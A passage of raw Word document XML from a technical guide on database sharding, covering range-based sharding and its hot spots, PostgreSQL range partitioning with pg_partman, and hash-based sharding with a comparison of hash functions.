      <w:r w:rsidRPr="00875520">
        <w:t>Range queries are efficient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456A32A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  SELECT * FROM users WHERE user_id BETWEEN 100,000,000 AND 150,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABE4B3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Entirely on Shard 1 (no scatter-gather)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715939D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070D402F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  SELECT * FROM orders WHERE created_at BETWEEN '2024-01-01' AND '2024-01-31'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2263F26A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If sharded by created_at: entirely on the shard containing January 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F578DD8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Time-range queries are shard-local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9804C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="74EB9B94" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Prefix queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBC70E8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  SELECT * FROM events WHERE tenant_id = 'acme' AND timestamp &gt; T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11443CBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If sharded by (tenant_id, timestamp): one shard serves the full query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DAEAF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4673CF94" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Natural clustering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF4B2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Rows in the same range are physically co-located</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E237866" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Range scans within a shard have sequential I/O characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CEE1B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Better cache behavior for range-access patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5B1F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Range-based sharding disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D787EE9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A97D00" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hot spots (the critical failure mode):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2D1FFF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Monotonically increasing keys (auto-increment IDs, timestamps):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D315FE9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    All new inserts go to the last shard (the one containing the current range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A396B87" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Last shard: 100% of write load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DED384" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Other shards: read-only (all historical data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A652EA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB328E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Example: shard by created_at for an orders table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F376B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Shard 1: Jan 2020 (millions of rows, read-mostly, cool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4DE8CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Shard 2: Jan 2021 (millions of rows, read-mostly, cool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE8CDA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Shard 3: Jan 2022 (millions of rows, read-mostly, cool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50263697" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Shard 4: Jan 2023 to now (all writes going here, overloaded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65091E3D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D9ECC4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    This defeats the purpose of sharding for write scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285CF68B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Fix: hash the key before range assignment, or use hash-based sharding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116AF616" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4F6F5753" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Uneven data distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D75E0DE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Some ranges may have far more data than others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E409D0F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  A popular username prefix fills one shard, less popular fills another unevenly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD61E63" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458C947" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Mitigation: dynamic range adjustment (split hot ranges, merge cold ranges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E98CF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">              — significant operational complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA92C3F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL declarative range partitioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081327DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECD486" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Range partitioning by created_at (time-series pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1FBF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>CREATE TABLE orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424BD9B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    order_id    BIGINT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EB4685" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    user_id     BIGINT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD59BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    created_at  TIMESTAMP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0068D0ED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    amount      DECIMAL(10,2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023D416" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    status      TEXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098C2E7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>) PARTITION BY RANGE (created_at);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DFE86B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="65E43280" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Create monthly partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E724C56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE orders_2024_01 PARTITION OF orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E77868" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    FOR VALUES FROM ('2024-01-01') TO ('2024-02-01');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2802D652" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE4C589" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE orders_2024_02 PARTITION OF orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567AD6A9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    FOR VALUES FROM ('2024-02-01') TO ('2024-03-01');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189EC95" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6345EC24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Automate partition creation (pg_partman extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C80FD05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SELECT partman.create_parent(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B77576C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    p_parent_table =&gt; 'public.orders',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61A353" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    p_control =&gt; 'created_at',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C37FDF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    p_interval =&gt; '1 month',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0D43E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    p_premake =&gt; 3  -- pre-create 3 future partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF225F1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A67D85" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7C2A3187" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Each partition can be on a different tablespace (different physical disk/server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BAFC8E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE orders_2024_01 PARTITION OF orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1577BED0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    FOR VALUES FROM ('2024-01-01') TO ('2024-02-01')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDFE258" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    TABLESPACE shard1_tablespace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB06F7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash-Based Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3946DFAA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Apply a hash function to the partition key and use the result to determine the shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF3D7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E7140B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8BAD8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Partition key: user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2024C9EF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Number of shards: N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63AB05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="10A4A673" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>shard_id = hash(user_id) % N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17925622" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="63FF0D59" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>For N=4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAFF59C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  user_id=1:         hash(1)         % 4 = 2 → Shard 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E3930" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  user_id=2:         hash(2)         % 4 = 1 → Shard 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E94C646" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  user_id=1000001:   hash(1000001)   % 4 = 0 → Shard 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C872B1F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  user_id=1000002:   hash(1000002)   % 4 = 3 → Shard 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E06E0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4BAA8535" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hash function selection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C5272E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  MD5(user_id)        → good distribution, not for security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D0341" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  FNV-1a(user_id)     → fast, good distribution for integer keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F28B8A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  MurmurHash3(user_id) → very fast, excellent distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADFE615" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  xxHash(user_id)     → fastest, excellent distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A68E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE74561" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  DO NOT use: language-native hash functions (Python's hash(), Java's hashCode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D5D73" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → implementation-specific, can change between runtime versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6DBFE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Different language services compute different shard IDs for same key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C28999" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash-based sharding advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2582D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0618ED77" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Uniform distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A97AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Hash functions designed for uniform output → even data distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F793FC0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Eliminates hot spots for monotonically increasing keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698FB7A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each shard receives approximately 1/N of all inserts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4984D10A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="07544AE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Simplicity of routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9FA00" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  O(1) computation: shard_id = hash(key) % N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A889E6E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  No lookup table required, no metadata to maintain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56329FED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Deterministic: same key always maps to same shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E2940" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="58F17A81" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Handles arbitrary key distributions:</w:t>
      </w:r>
    </w:p>
